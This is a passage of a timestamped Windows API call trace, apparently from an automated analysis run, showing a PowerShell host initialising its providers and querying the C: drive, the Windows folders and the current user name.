	[0112.370] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b8517e0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xcd170, lpMaximumComponentLength=0xcd16c, lpFileSystemFlags=0xcd168, lpFileSystemNameBuffer=0x1b851850, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xcd170*=0x9c354b42, lpMaximumComponentLength=0xcd16c*=0xff, lpFileSystemFlags=0xcd168*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0112.371] CoTaskMemFree (pv=0x1b8517e0) 
	[0112.371] CoTaskMemFree (pv=0x1b851850) 
	[0112.371] SetErrorMode (uMode=0x1) returned 0x1
	[0112.371] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0112.372] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcceb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0112.372] SetErrorMode (uMode=0x1) returned 0x1
	[0112.372] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0112.372] SetErrorMode (uMode=0x1) returned 0x1
	[0112.372] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcceb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0112.372] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0112.373] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0112.373] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccc90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0112.373] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0112.374] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0112.374] SetErrorMode (uMode=0x1) returned 0x1
	[0112.374] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccf40 | out: lpFileInformation=0xccf40*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0112.374] SetErrorMode (uMode=0x1) returned 0x1
	[0112.374] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0112.374] SetErrorMode (uMode=0x1) returned 0x1
	[0112.374] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccf40 | out: lpFileInformation=0xccf40*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0112.375] SetErrorMode (uMode=0x1) returned 0x1
	[0112.375] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0112.375] SetErrorMode (uMode=0x1) returned 0x1
	[0112.375] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0112.375] SetErrorMode (uMode=0x1) returned 0x1
	[0112.375] CoTaskMemAlloc (cb=0x804) returned 0x1b0a10
	[0112.375] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b0a10, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0112.380] CoTaskMemFree (pv=0x1b0a10) 
	[0112.381] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.381] GetUserNameW (in: lpBuffer=0x1cf910, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0112.381] CoTaskMemFree (pv=0x1cf910) 
	[0112.382] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d0e620*="FileSystem", lpRawData=0x3d0e3b0) returned 1
	[0112.406] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.407] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.409] CoTaskMemAlloc (cb=0x804) returned 0x1b0a10
	[0112.409] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b0a10, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0112.409] CoTaskMemFree (pv=0x1b0a10) 
	[0112.409] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.409] GetUserNameW (in: lpBuffer=0x1cf910, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0112.410] CoTaskMemFree (pv=0x1cf910) 
	[0112.410] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d13e60*="Function", lpRawData=0x3d13bf0) returned 1
	[0112.412] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.412] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.412] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.693] CoTaskMemAlloc (cb=0x804) returned 0x1b0a10
	[0112.693] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b0a10, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0112.694] CoTaskMemFree (pv=0x1b0a10) 
	[0112.694] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.694] GetUserNameW (in: lpBuffer=0x1cf910, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0112.694] CoTaskMemFree (pv=0x1cf910) 
	[0112.694] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32f8f48*="Registry", lpRawData=0x32f8cd8) returned 1
	[0112.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.701] CoTaskMemAlloc (cb=0x804) returned 0x1b0a10
	[0112.701] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b0a10, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0112.702] CoTaskMemFree (pv=0x1b0a10) 
	[0112.702] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.702] GetUserNameW (in: lpBuffer=0x1cf910, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0112.702] CoTaskMemFree (pv=0x1cf910) 
	[0112.703] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32fe360*="Variable", lpRawData=0x32fe0f0) returned 1
	[0112.705] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.706] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.710] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.710] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0112.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0112.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0112.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0112.838] CoTaskMemAlloc (cb=0x804) returned 0x1b0a10
	[0112.838] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b0a10, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0112.838] CoTaskMemFree (pv=0x1b0a10) 
	[0112.838] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.838] GetUserNameW (in: lpBuffer=0x1cf910, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0112.838] CoTaskMemFree (pv=0x1cf910) 
	[0112.839] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3311f78*="Certificate", lpRawData=0x3311d08) returned 1
	[0112.849] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.849] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.853] GetLogicalDrives () returned 0x4
	[0112.853] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0112.853] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0112.854] CoTaskMemAlloc (cb=0x20e) returned 0x1b843970
	[0112.854] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b843970 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0112.854] CoTaskMemFree (pv=0x1b843970) 
	[0112.855] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.855] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.855] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.855] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.899] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.899] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.899] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.901] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.901] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.901] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0112.902] SetErrorMode (uMode=0x1) returned 0x1
	[0112.902] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0112.902] SetErrorMode (uMode=0x1) returned 0x1
	[0112.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0112.902] SetErrorMode (uMode=0x1) returned 0x1
	[0112.902] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0112.902] SetErrorMode (uMode=0x1) returned 0x1
	[0112.902] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.902] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.902] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0112.906] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0112.907] SetErrorMode (uMode=0x1) returned 0x1
	[0112.907] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccff0 | out: lpFileInformation=0xccff0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0112.907] SetErrorMode (uMode=0x1) returned 0x1
	[0112.907] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0112.907] SetErrorMode (uMode=0x1) returned 0x1
	[0112.907] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccff0 | out: lpFileInformation=0xccff0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0112.907] SetErrorMode (uMode=0x1) returned 0x1
	[0112.907] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0112.907] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0112.907] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0112.907] SetErrorMode (uMode=0x1) returned 0x1
	[0112.908] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xccff0 | out: lpFileInformation=0xccff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0112.908] SetErrorMode (uMode=0x1) returned 0x1
	[0112.908] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0112.908] SetErrorMode (uMode=0x1) returned 0x1
	[0112.908] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xccff0 | out: lpFileInformation=0xccff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0112.908] SetErrorMode (uMode=0x1) returned 0x1
	[0112.908] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0112.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0112.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0112.908] SetErrorMode (uMode=0x1) returned 0x1
	[0112.908] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xccff0 | out: lpFileInformation=0xccff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0112.908] SetErrorMode (uMode=0x1) returned 0x1
	[0112.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0112.909] SetErrorMode (uMode=0x1) returned 0x1
	[0112.909] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xccff0 | out: lpFileInformation=0xccff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0112.909] SetErrorMode (uMode=0x1) returned 0x1
	[0112.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
